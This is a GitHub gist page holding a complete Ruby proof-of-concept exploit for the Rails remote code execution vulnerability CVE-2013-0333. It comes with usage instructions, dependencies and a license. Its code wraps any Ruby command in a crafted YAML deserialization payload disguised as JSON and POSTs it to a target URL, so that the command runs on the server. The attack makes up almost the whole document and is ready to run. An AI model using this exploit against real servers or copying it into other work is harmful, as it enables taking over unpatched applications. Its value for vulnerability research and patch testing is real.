public
Last active

Proof-of-Concept exploit for the new Rails Remote Code Execution vulnerability (CVE-2013-0333)

  • Download Gist
rails_omakase.rb
Ruby
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122
#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0333)
#
# ## Advisory
#
# https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo
#
# ## Caveats
#
# * Does not support Ruby 1.8.7.
# * Only tested against Rails 3.0.x.
#
# ## Synopsis
#
# $ rails_omakase.rb URL RUBY
#
# ## Dependencies
#
# $ gem install ronin-support
#
# ## Example
#
# $ rails_omakase.rb http://localhost:3000/secrets "puts 'lol'"
#
# ### config/routes.rb
#
# resources :secrets
#
# ### app/controllers/secrets_controller.rb
#
# def show
# p params
# end
#
# ## License
#
# Copyright (c) 2013 Postmodern
#
# This exploit is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This exploit is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this exploit. If not, see <http://www.gnu.org/licenses/>.
#
# ## Shoutz
#
# drraid, cd, px, sanitybit, sysfail, trent, dbcooper, goldy, coderman, letch,
# starik, toby, jlt, HockeyInJune, cloud, zek, natron, amesc, postmodern,
# mephux, nullthreat, evoltech, flatline, r0bglesson, lianj, @bascule,
# @charliesome, @homakov, @envygeek, @nzkoz, @technoweenie (for adding
# ActiveSupport::JSON::Backends::Yaml and making it the default),
# @bitsweat (for exposing the vulnerability), @j2h (for removing
# ActiveSupport::JSON in favour of multi-json), @dhh, Omakase, YAML,
# Kreayshawn, Lil Debbie, Boxxy, Stimulator, "rockin' the wolf on your noggin",
# Cholombiano Style, Russian Parallel Cinema, SophSec crew and affiliates.
#
 
require 'ronin/network/http'
require 'ronin/formatting/html'
require 'ronin/ui/output'
require 'yaml'
 
include Ronin::Network::HTTP
include Ronin::UI::Output::Helpers
 
def exploit(url,payload)
payload = "(#{payload}; @executed = true) unless @executed"
escaped_payload = "foo\nend\n#{payload}\n__END__\n"
encoded_payload = escaped_payload.to_yaml.sub('--- ','').chomp
 
yaml = %{
--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? #{encoded_payload}
: !ruby/struct
defaults:
:action: create
:controller: foos
required_parts: []
requirements:
:action: create
:controller: foos
segment_keys:
- :format
}.strip
encoded_yaml = yaml.gsub(':','\u003a')
 
return http_post(
:url => url,
:headers => {
:content_type => 'application/json',
:x_http_method_override => 'get'
},
:body => encoded_yaml
)
end
 
if $0 == __FILE__
unless ARGV.length >= 2
$stderr.puts "usage: #{$0} URL RUBY"
exit -1
end
 
url = ARGV[0]
payload = ARGV[1]
 
print_info "POSTing #{payload} to #{url} ..."
response = exploit(url,payload)
 
case response.code
when '200' then print_info "Success!"
when '500' then print_error "Error!"
else print_error "Received response code #{response.code}"
end
end

Please sign in to comment on this gist.

Something went wrong with that request. Please try again.